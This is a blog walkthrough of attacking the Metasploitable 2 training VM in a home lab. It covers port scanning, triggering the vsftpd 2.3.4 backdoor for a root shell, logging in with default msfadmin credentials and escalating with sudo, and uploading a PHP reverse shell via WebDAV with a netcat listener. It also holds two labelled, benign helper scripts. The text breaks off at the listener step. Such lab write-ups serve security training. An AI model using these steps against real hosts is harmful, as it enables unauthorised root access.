The Professional Hacker Digest: Metasploitable 2 - My Walkthrough<br />
Austin, 2018-03-11<br />
<br />
It has been SO LONG since I posted something and I want to thank everyone who has been checking in and who continued to visit my blog while I was not posting. I have a good explanation for why I disappeared for so long, but that will be a separate blog post.<br />
<br />
Regular disclaimer: This blog post is my own thoughts and words and does not represent the views of any past, present, or future employers. I also do not take any responsibility for any of the information used within this blog post or any other post on this blog for any reason. Hack responsibly. Hack Professionally.<br />
<br />
For this blog post, we will be walking through Metasploitable 2. While there are many reviews of this wonderful training box, I wanted to contribute my own walkthrough. So without further ado, let's jump in.<br />
<br />
I'm going to skip over setting up the virtual machine, if you would like me to show you how I did it I can create a blog post addendum; let me know in the comments.<br />
<br />
Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMAk03abznkJNw1nGFTNsTdeX1YfMESsD1MjU9rkdJCh5uQogZycF2LHnwAVXLeTlnj7wt2Ub5w_UBHP6HjrWJLv0IKikJ_myRjvrVytFXF03QMExhXawsitEw_Q_qAn4nro5v3giBOcZM/s1600/1_nmap_basic_all_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMAk03abznkJNw1nGFTNsTdeX1YfMESsD1MjU9rkdJCh5uQogZycF2LHnwAVXLeTlnj7wt2Ub5w_UBHP6HjrWJLv0IKikJ_myRjvrVytFXF03QMExhXawsitEw_Q_qAn4nro5v3giBOcZM/s320/1_nmap_basic_all_command.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhistBjqfKmExJhml4e6yW_WrJq3XBG-g8_Frz8HQYh0tXknYlSWNOhliS7jp0mi4Pyqof6PaUy9YqJtjqUUvJ2UpqbR2iMXhkY_qgazq4e-qtxpHiUr8L8fMKyKsHL-ywokLFE1dSCFa2-/s1600/2_nmap_basic_all_command_output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhistBjqfKmExJhml4e6yW_WrJq3XBG-g8_Frz8HQYh0tXknYlSWNOhliS7jp0mi4Pyqof6PaUy9YqJtjqUUvJ2UpqbR2iMXhkY_qgazq4e-qtxpHiUr8L8fMKyKsHL-ywokLFE1dSCFa2-/s320/2_nmap_basic_all_command_output.png" width="320" /></a></div>
<br />
The nmap command uses a few flags to conduct the initial scan. The -Pn flag skips host discovery pings and just assumes the host is up. In this case, I know the host is up because I'm hosting it locally. The -sS flag is for a SYN scan. The SYN scan is less reliable because it does not complete the three-way handshake while trying to connect to the ports; however, that also means it CAN BE more stealthy. Some IDS/IPS/firewall systems won't log the SYN packets that hit the system and are more likely to log actual connections made with remote systems once the three-way handshake is complete. This is not to say it's not POSSIBLE to log a SYN scan, but it is less likely given the amount of information that would need to be stored. The next flag, -T5, tells nmap to scan REALLY fast. I believe it says "insane" in the man page documentation. Yup, it does, I checked. The next flag, -p-, says to scan all ports. This flag can also be written as -p1-65535. The last flag, -oA, tells nmap to output all formats (normal, greppable, and XML) and name them "nmap_basic_all" with the proper extension. Lastly, as I mentioned before, we are scanning 10.0.0.22 for this walkthrough. When you scan your own Metasploitable 2 image, it is very likely the IP address will be different.<br />
<br />
We can also see the results below. These are all the ports nmap found open according to the SYN scan. We can use these results to scan fewer ports with a more intense scan, so we do some linux-fu to get a list of port numbers to scan. You can see my linux-fu below. Fair warning: you may see me lose port 21. I remember it later and have included an additional image with details about it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKlctTM6rQ2duhdr76ag11GJ_tGx1s0kHuftC4F9hc62XXx6-YJlovk7R3uvvil31zmgqDiEcb3wjCCnkQ4-QpA0ip884FRnA4nQ7vmQPr4de_Aqjcxt9YjkA2qXleMHiNHZUgupa0L8gp/s1600/3_linux_fu_get_list_of_ports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKlctTM6rQ2duhdr76ag11GJ_tGx1s0kHuftC4F9hc62XXx6-YJlovk7R3uvvil31zmgqDiEcb3wjCCnkQ4-QpA0ip884FRnA4nQ7vmQPr4de_Aqjcxt9YjkA2qXleMHiNHZUgupa0L8gp/s320/3_linux_fu_get_list_of_ports.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So here is my linux-fu. I 'cat' the greppable nmap file into sed, which replaces every comma with a newline. I pipe that into cut to grab the port numbers, then into another sed that strips spaces for formatting, then into a grep that drops every line containing the word "Nmap" or "Host" (this is where I lose port 21: the first port sits on the same line as the "Host" prefix, so that whole line gets filtered out). Then I recombine the newline-separated list back into a comma-separated list to pass to nmap, which is easier done with perl than sed (I don't know why... the sed answers looked significantly more complicated), and lastly I remove the trailing comma and write the result to a file called ports.txt. I'm sure there is a much better way to do this (and not lose port 21). Please comment below if you have a better script or set of commands!</div>
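Here is one way to do the same job without losing the first port, as an added example that is not part of the original post. It reads the "Ports:" field of the .gnmap file directly instead of splitting the whole line on commas and then throwing away anything containing "Host". The sample .gnmap content is constructed to look like the post's -oA output; it is not real scan data.

```shell
#!/bin/sh
# Added example (not from the original post): extract the open ports from an
# nmap greppable (.gnmap) file as a comma-separated list suitable for -p.

gnmap_open_ports() {
  # Reads .gnmap text on stdin. Fields on a "Host:" line are tab-separated;
  # keep only the "Ports: ..." field, split it into one "port/state/proto/..."
  # entry per line, keep entries whose state is "open", and join the port
  # numbers back together with commas.
  awk -F'\t' '/^Host:/ { for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) print substr($i, 8) }' \
    | tr ',' '\n' \
    | sed 's/^ *//' \
    | grep '/open/' \
    | cut -d/ -f1 \
    | paste -sd, -
}

sample_gnmap() {
  # Constructed .gnmap content shaped like the post's scan output (port 21
  # shares its line with the "Host:" prefix, exactly where the post's grep
  # -v "Host" lost it). Not a real capture.
  printf '# Nmap scan initiated as: nmap -Pn -sS -T5 -p- -oA nmap_basic_all 10.0.0.22\n'
  printf 'Host: 10.0.0.22 ()\tStatus: Up\n'
  printf 'Host: 10.0.0.22 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/filtered/tcp//smtp///\tIgnored State: closed (65531)\n'
  printf '# Nmap done\n'
}

# Stand-alone run against the constructed sample: prints 21,22,23
sample_gnmap | gnmap_open_ports
```

Against the real file you would feed it nmap_basic_all.gnmap on stdin and hand the result to the follow-up scan the post runs next, e.g. nmap -sV -sC -p "$(gnmap_open_ports < nmap_basic_all.gnmap)" 10.0.0.22. Only entries in state "open" are kept, so "open|filtered" UDP results would need a looser match.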
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTGzEKNpQsiylkN57fWmQhRe5w2fasw-D9U0M8f7Yc1XgB41Clm44FdtnTaYUGW87VA9UaQxqwWmPGJ7p7T_zDP5OX7U3KXjs6c2hQB5ck9hfE60xWst-fr66YPI7XboNCRoodG0yVn3C-/s1600/4_nmap_specific_port_scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTGzEKNpQsiylkN57fWmQhRe5w2fasw-D9U0M8f7Yc1XgB41Clm44FdtnTaYUGW87VA9UaQxqwWmPGJ7p7T_zDP5OX7U3KXjs6c2hQB5ck9hfE60xWst-fr66YPI7XboNCRoodG0yVn3C-/s320/4_nmap_specific_port_scan.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2PVHdExzQQPvPp38OM93py3KiuhyphenhypheniNfyghj9qso4rW9V3bUUN6OugOs-ohcZhwhEvHw8l-RQ31Kbsoi5kxIkJP8MyKo2JxRpazpGa13q-H989qaglCZlhKR5L0UHqjeyN9EIFt2t_xlLk/s1600/5_nmap_specific_port_scan_output_pt1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2PVHdExzQQPvPp38OM93py3KiuhyphenhypheniNfyghj9qso4rW9V3bUUN6OugOs-ohcZhwhEvHw8l-RQ31Kbsoi5kxIkJP8MyKo2JxRpazpGa13q-H989qaglCZlhKR5L0UHqjeyN9EIFt2t_xlLk/s320/5_nmap_specific_port_scan_output_pt1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26cjjeqZWDz58z11PoLxOmG_lzGxvRNqcJbWVcwbTeYMB1Od-uPu1t9IJ3sFCH_KSpl6PK9rxxJ9W9ToyAVYPNWDqi7Gc_8q4GEyjiKLduxCzoaFCfjeeGpvmj1U5njMB7Cr1yqtOVvKv/s1600/6_nmap_specific_port_scan_output_pt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26cjjeqZWDz58z11PoLxOmG_lzGxvRNqcJbWVcwbTeYMB1Od-uPu1t9IJ3sFCH_KSpl6PK9rxxJ9W9ToyAVYPNWDqi7Gc_8q4GEyjiKLduxCzoaFCfjeeGpvmj1U5njMB7Cr1yqtOVvKv/s320/6_nmap_specific_port_scan_output_pt2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheVPFjUGX3u28MdmdAAQxcxzRMHeUwkKEgUX10m4DeuB11ioFnej9mbsK8U3SbqlzCOR1DDfzYJffyP43qAbDwYEmvagzcpEY7A1HigRyM8UD_-jJn6mO5ZTipLSlJj8P7DqG1sAEHnIfr/s1600/7_nmap_specific_port_scan_output_pt3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheVPFjUGX3u28MdmdAAQxcxzRMHeUwkKEgUX10m4DeuB11ioFnej9mbsK8U3SbqlzCOR1DDfzYJffyP43qAbDwYEmvagzcpEY7A1HigRyM8UD_-jJn6mO5ZTipLSlJj8P7DqG1sAEHnIfr/s320/7_nmap_specific_port_scan_output_pt3.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyDfphQqcsgggckcovcE_jWW1KFbw_UJjh6YHgJ5ih4gP6_7pLePvpfG2eXTOVcm7zgak7r9sf_8rXybN6fdaknna6PpYhfkVew2WzSL0kwv5PZZ8BXKEacTen-TvTwgs0qpYHCCmLXV3/s1600/8_nmap_lost_ftp_port.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyDfphQqcsgggckcovcE_jWW1KFbw_UJjh6YHgJ5ih4gP6_7pLePvpfG2eXTOVcm7zgak7r9sf_8rXybN6fdaknna6PpYhfkVew2WzSL0kwv5PZZ8BXKEacTen-TvTwgs0qpYHCCmLXV3/s320/8_nmap_lost_ftp_port.png" width="320" /></a></div>
<br />
Now you've seen all the results from the service and default-script scans. The -sV flag is for version scanning and the -sC flag is for default-script scanning. The $(cat ports.txt) is bash command substitution, which runs a command inside a command and inserts its output directly into the outer command. So $(cat ports.txt) actually runs cat on the file, and the output, the comma-separated list of ports, is passed along with the -p flag to nmap.<br />
<br />
Now that we have finished our first round of scanning, let's begin walking through exploits for this box.<br />
<br />
The first exploit is on port 21, vsftpd 2.3.4. This is one of my favorites because it's so easy to exploit. This version sometimes has the vulnerability because someone committed code to the vsftpd repository that contained a backdoor, triggered when a smiley face ( :) ) is used in the username. This opens up a backdoor on port 6200. So first let's look at the Metasploit exploit.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDW7y7b_wOCw3y0jNAn0XtsrzkP1pGKOqAHJdhF4su2YbcZjmBzFFachATuNUAa0P5EJlDfSleFxnnTcCFdkVfL-jk2XrddMWztZoiy_bfn62g0jUO9bh6wwVGj7yMQf6DBtp6n4dnETW/s1600/10_vsftpd_234_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDW7y7b_wOCw3y0jNAn0XtsrzkP1pGKOqAHJdhF4su2YbcZjmBzFFachATuNUAa0P5EJlDfSleFxnnTcCFdkVfL-jk2XrddMWztZoiy_bfn62g0jUO9bh6wwVGj7yMQf6DBtp6n4dnETW/s320/10_vsftpd_234_metasploit.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGi1p_duG08HF01AgBKHj7Uik29_QhhhGnzibksuHHyZB82DGMBXtRCVSbKFSVGr3q14rT4c4eZLCGVklXblBOlodxco67_LY1S9IHy1KEFq5cdsONaP8-sTN-RtaQqEJjJU1046Jhlm59/s1600/11_vsftpd_exploit_show_options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGi1p_duG08HF01AgBKHj7Uik29_QhhhGnzibksuHHyZB82DGMBXtRCVSbKFSVGr3q14rT4c4eZLCGVklXblBOlodxco67_LY1S9IHy1KEFq5cdsONaP8-sTN-RtaQqEJjJU1046Jhlm59/s320/11_vsftpd_exploit_show_options.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjjzMCHZk6EAEKGjtVJs61gc458w3ZqRKhNpwFqfNec9A4B1ig-VEMTGSxM-gn6p8F5Ets6VVKFY3z_IjQfrp1N0rmZ5t7qzyEDnlMZW0ZXR0XoKacBjmMee-KFBHwKcr5myxubZfMYc5/s1600/12_vsftpd_exploit_worked_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjjzMCHZk6EAEKGjtVJs61gc458w3ZqRKhNpwFqfNec9A4B1ig-VEMTGSxM-gn6p8F5Ets6VVKFY3z_IjQfrp1N0rmZ5t7qzyEDnlMZW0ZXR0XoKacBjmMee-KFBHwKcr5myxubZfMYc5/s320/12_vsftpd_exploit_worked_metasploit.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
With this shell, we don't see the prompt we are so used to having because all the environment variables that usually come with a "proper" shell are not included in this instance of the shell. We can get those back and have it operate like a proper shell and I'll show you that with our netcat version of the exploit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1orDrm17cI_6sYpB7JermSd9bHmSFDFWEAhQ6E_P9k-Ezo8xUWNLBAtwr3NY-vHyS9hY7xnNnvNMCX0cIPnd3o9q0leDYk5Z6lj5-csYBPavrA1THcvZP-ng2PIJsrRAzR1otqfZF_9bG/s1600/13_nc_vsftpd_exploit_worked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1orDrm17cI_6sYpB7JermSd9bHmSFDFWEAhQ6E_P9k-Ezo8xUWNLBAtwr3NY-vHyS9hY7xnNnvNMCX0cIPnd3o9q0leDYk5Z6lj5-csYBPavrA1THcvZP-ng2PIJsrRAzR1otqfZF_9bG/s320/13_nc_vsftpd_exploit_worked.png" width="320" /></a></div>
<br />
Here we connect to the FTP server (port 21) with netcat (nc) and type USER as the FTP command with any username containing the smiley, which triggers the backdoor. It does not matter what we use for the password, as you can see by the password I typed. After that, we connect to the opened backdoor on port 6200 and we have root access to the machine. A complete compromise.<br />
<br />
I almost forgot: here is the "normal" shell that we get by calling pty.spawn in python.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQYrr_sRmEWekaMgTVaRGeD1a8LwLkFail54X2cA3h-3Kg8CMMMah3RfiwyhwxEfG2yBZaKnYTCr1sRtV8_W6EvLZGelKcuFyFTPWMRNZT2-Ik4sy4NJSQlP_iT8Dc0_YlwV1KCU79i2p/s1600/14_nc_normal_bash_prompt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQYrr_sRmEWekaMgTVaRGeD1a8LwLkFail54X2cA3h-3Kg8CMMMah3RfiwyhwxEfG2yBZaKnYTCr1sRtV8_W6EvLZGelKcuFyFTPWMRNZT2-Ik4sy4NJSQlP_iT8Dc0_YlwV1KCU79i2p/s320/14_nc_normal_bash_prompt.png" width="320" /></a></div>
<br />
<br />
We're going to skim over port 22 right now because SSH itself is not vulnerable, but we can use other vulnerabilities later on to set up SSH access for ourselves. One example is finding credentials, like msfadmin:msfadmin, from telnet or the website. We can use those to log in via ssh or telnet. This is very unlikely in practice; however, if you did find credentials and wanted to use them, you would log in to the remote target using ssh, ssh msfadmin@10.0.0.22, put in the password, msfadmin, and get a shell like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrlrGYjomVUGJt21yyj3i2gh0in2GL7P2ZomVumGvbmYt5Aq4oTwiCuH6Vu-vIfcYV2MaIS-BXlIdHG5fKPTOHMbSTE8WPRPUavFWZkvQ38HCffjpkNmque-b0z8l_vMdpba-7kqtqrIt/s1600/16_ssh_msfadmin_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrlrGYjomVUGJt21yyj3i2gh0in2GL7P2ZomVumGvbmYt5Aq4oTwiCuH6Vu-vIfcYV2MaIS-BXlIdHG5fKPTOHMbSTE8WPRPUavFWZkvQ38HCffjpkNmque-b0z8l_vMdpba-7kqtqrIt/s320/16_ssh_msfadmin_login.png" width="320" /></a></div>
<br />
After you're logged on, one of the simplest ways to elevate privileges is to check if you already have them. We know msfadmin's password, so by typing 'sudo -l' we list the sudo permissions for this user. We see that it has all permissions and we can run 'sudo su root' to change our user to root. Boom!<br />
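The defender's side of that 'sudo -l' check is knowing which accounts on a box hold an unrestricted grant before someone else finds out. The script below is an added example, not from the original post: it reads sudoers text on stdin and prints every principal (user or %group) whose entry amounts to ALL=(ALL) ALL, with or without NOPASSWD. The sudoers content it runs against is constructed for the demonstration, not Metasploitable's real file.

```shell
#!/bin/sh
# Added example (not from the original post): list sudoers principals that
# hold a full root grant, the situation 'sudo -l' revealed for msfadmin.

unrestricted_sudo_principals() {
  # Reads sudoers text on stdin. Drop comment lines, keep only user specs of
  # the form "<who> ALL=(ALL) ALL" or "<who> ALL=(ALL:ALL) NOPASSWD: ALL",
  # and print the first column of each as one comma-separated line.
  grep -v '^[[:space:]]*#' \
    | grep -E '^[[:alnum:]_%@.-]+[[:space:]]+ALL[[:space:]]*=[[:space:]]*\(ALL(:ALL)?\)[[:space:]]*(NOPASSWD:[[:space:]]*)?ALL[[:space:]]*$' \
    | awk '{ print $1 }' \
    | paste -sd, -
}

sample_sudoers() {
  # Constructed sudoers content for the demonstration; not a real file.
  # The last two entries are scoped grants and must not be flagged.
  cat <<'EOF'
# /etc/sudoers (constructed sample)
Defaults env_reset
root      ALL=(ALL) ALL
%admin    ALL=(ALL) ALL
msfadmin  ALL=(ALL:ALL) NOPASSWD: ALL
backup    ALL=(root) /usr/bin/rsync
deploy    ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
EOF
}

# Stand-alone run against the constructed sample: prints root,%admin,msfadmin
sample_sudoers | unrestricted_sudo_principals
```

On a real host you would run it as root with /etc/sudoers and each file under /etc/sudoers.d on stdin (cat them together); anything it prints besides root is an account whose password alone is a full compromise, which is exactly why the msfadmin credentials are such a short path on this box.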
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyl-3VfO-BlRQvGqYWaI9MUGrxBBu-azv8bh1C1RW6j-8sW3pVAd56vm_7VQNq_KHkv8FN-_drR7WiiWl-WtKREO28n_8BpqMAHEfi8b2cWd0VhNelxgk8p0lVBA61kcb0htim3OgbH-qM/s1600/17_msfadmin_has_sudo_permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyl-3VfO-BlRQvGqYWaI9MUGrxBBu-azv8bh1C1RW6j-8sW3pVAd56vm_7VQNq_KHkv8FN-_drR7WiiWl-WtKREO28n_8BpqMAHEfi8b2cWd0VhNelxgk8p0lVBA61kcb0htim3OgbH-qM/s320/17_msfadmin_has_sudo_permissions.png" width="320" /></a></div>
<br />
Telnet (port 23) is also open and the same series of steps would work with telnet. It is rare for telnet to be open nowadays, but it is still seen on old boxes and routers more often than it should be. It largely stopped being used because it sends all traffic in the clear across the network, so anyone snooping could see your username and password, in the clear, and know exactly which machine you were logging into. This would effectively give everyone your level of access to any machine you can access remotely.<br />
<br />
Next we are going to look at the website on port 80. Again, this site shows us credentials to log into the machine. Let's first look at the WebDAV section of the site. According to <a href="https://en.wikipedia.org/wiki/WebDAV" target="_blank">Wikipedia</a>, WebDAV is an extension of HTTP that allows users to author pages over HTTP. For example, methods like PUT and DELETE can be used to put files on and delete files from the server. THIS IS REALLY BAD. Let me walk you through why...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFoHYs8EgSmY77KYfTKMzHR6h59w-VUaUG16TBJsBDmIMk_Vp8Y0QQpSWeHi-j48OGcUBoOy7vCEtsQH9bN3kPo9cOv8nGnmwMM2hTk4Fa5wzquQhOu0k7GIIQmsEH1Vj_j87aHhgzPoXh/s1600/15_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFoHYs8EgSmY77KYfTKMzHR6h59w-VUaUG16TBJsBDmIMk_Vp8Y0QQpSWeHi-j48OGcUBoOy7vCEtsQH9bN3kPo9cOv8nGnmwMM2hTk4Fa5wzquQhOu0k7GIIQmsEH1Vj_j87aHhgzPoXh/s320/15_webpage.png" width="320" /></a></div>
<br />
Here is the main page for the website. We're going to be looking at WebDAV so let's head on over to that page.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gM2KBj_lmG_g1ulQqJKPMOyiO60Ix_I8ixUuY2S3cf0w79hgNns7aW18MS1O6HXW-8g6JAgTCKIkqRHBJaMBoEc6fuNA8ebnJDCUavnrbGaV2Ofo0mrTh-_6u0UlfohhVEYMAo7GGJxo/s1600/19_web_dav_homepage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gM2KBj_lmG_g1ulQqJKPMOyiO60Ix_I8ixUuY2S3cf0w79hgNns7aW18MS1O6HXW-8g6JAgTCKIkqRHBJaMBoEc6fuNA8ebnJDCUavnrbGaV2Ofo0mrTh-_6u0UlfohhVEYMAo7GGJxo/s320/19_web_dav_homepage.png" width="320" /></a></div>
<br />
We can see it's an empty directory, which is no big deal, but since WebDAV allows us to put and delete files, let's see if we can introduce our own malicious code to the website. Hint: we can.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJZdm8Moq-GJPaREeSeupG2HmLNaVfDsLBGYiJW-Ivr7m-XJdmc8K1eEqeTcqRDnp6LxTGM7G66cNPPjzuOhjmGwGy8jnCxStdfzhKQnMtyPLRExVGnfq9BL6akb0hYgk1gOlTZkkQ27Hw/s1600/18_404_test_txt_missing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJZdm8Moq-GJPaREeSeupG2HmLNaVfDsLBGYiJW-Ivr7m-XJdmc8K1eEqeTcqRDnp6LxTGM7G66cNPPjzuOhjmGwGy8jnCxStdfzhKQnMtyPLRExVGnfq9BL6akb0hYgk1gOlTZkkQ27Hw/s320/18_404_test_txt_missing.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktw-QwtST1vgsNuZg9hXH3L72nkAvoKzny42LgPVLQ4bQ7zVAMVsomurKud7h9q6Z_yajg6AJnvOoieV4_gRyVzqwDcpgE_lWfCENWlwb6DDL3G-huSvMcDBjksFAxUCZBAZKvS_iwXFn/s1600/20_put_test_txt_webdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktw-QwtST1vgsNuZg9hXH3L72nkAvoKzny42LgPVLQ4bQ7zVAMVsomurKud7h9q6Z_yajg6AJnvOoieV4_gRyVzqwDcpgE_lWfCENWlwb6DDL3G-huSvMcDBjksFAxUCZBAZKvS_iwXFn/s320/20_put_test_txt_webdav.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-oM6Ftkc0a5of7hkcKvEPEvS9kLswIUjqXa7dt1Pmwkdvwt__74MIpk3wdDYXAic77K6cEsV8flAhsLoOzSqXEXpl4CbubVa4QJaZvoYnYeVDlpsqcika3ONgmaa3DNr6pSvfC4Zi8ei/s1600/21_hello_world_webdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-oM6Ftkc0a5of7hkcKvEPEvS9kLswIUjqXa7dt1Pmwkdvwt__74MIpk3wdDYXAic77K6cEsV8flAhsLoOzSqXEXpl4CbubVa4QJaZvoYnYeVDlpsqcika3ONgmaa3DNr6pSvfC4Zi8ei/s320/21_hello_world_webdav.png" width="320" /></a></div>
<br />
As you can see we've introduced benign text into the site, but if we can insert ANY text into the site, we can get a remote shell. We can do this using a PHP webshell. First, let's grab the php-reverse-shell that ships with Kali and edit it so it calls us back.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-EeP7RMEInOfu9mdVohxLNJqji-tbd7Pd14p8ri9UDGlVlqgTRShon7XWQPRi4lukiTzCT6vLHe81BlLMqRkqBpGGRlOY37uyZj5qGhHK16Lg-8wO8hcNXaIhyphenhyphenKO5CQ3KAuptDQSwOIRc/s1600/22_php_reverse_webshell_vim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-EeP7RMEInOfu9mdVohxLNJqji-tbd7Pd14p8ri9UDGlVlqgTRShon7XWQPRi4lukiTzCT6vLHe81BlLMqRkqBpGGRlOY37uyZj5qGhHK16Lg-8wO8hcNXaIhyphenhyphenKO5CQ3KAuptDQSwOIRc/s320/22_php_reverse_webshell_vim.png" width="320" /></a></div>
<br />
Now that we put in the correct IP address, the reverse shell will call us back. We need a listener on port 1234 to catch the callback though. This can be done with netcat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
